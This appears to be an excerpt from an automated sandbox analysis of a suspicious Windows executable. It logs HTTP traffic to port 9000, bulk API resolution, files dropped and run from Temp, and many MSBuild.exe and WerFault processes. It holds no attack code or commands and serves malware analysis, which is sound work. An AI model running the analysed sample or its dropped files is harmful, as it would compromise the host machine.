Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49842
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49844
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49846
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 49858 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 9000
Source: unknown	Network traffic detected: HTTP traffic on port 9000 -> 49864

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Code function: 0_2_00408761 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408761

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
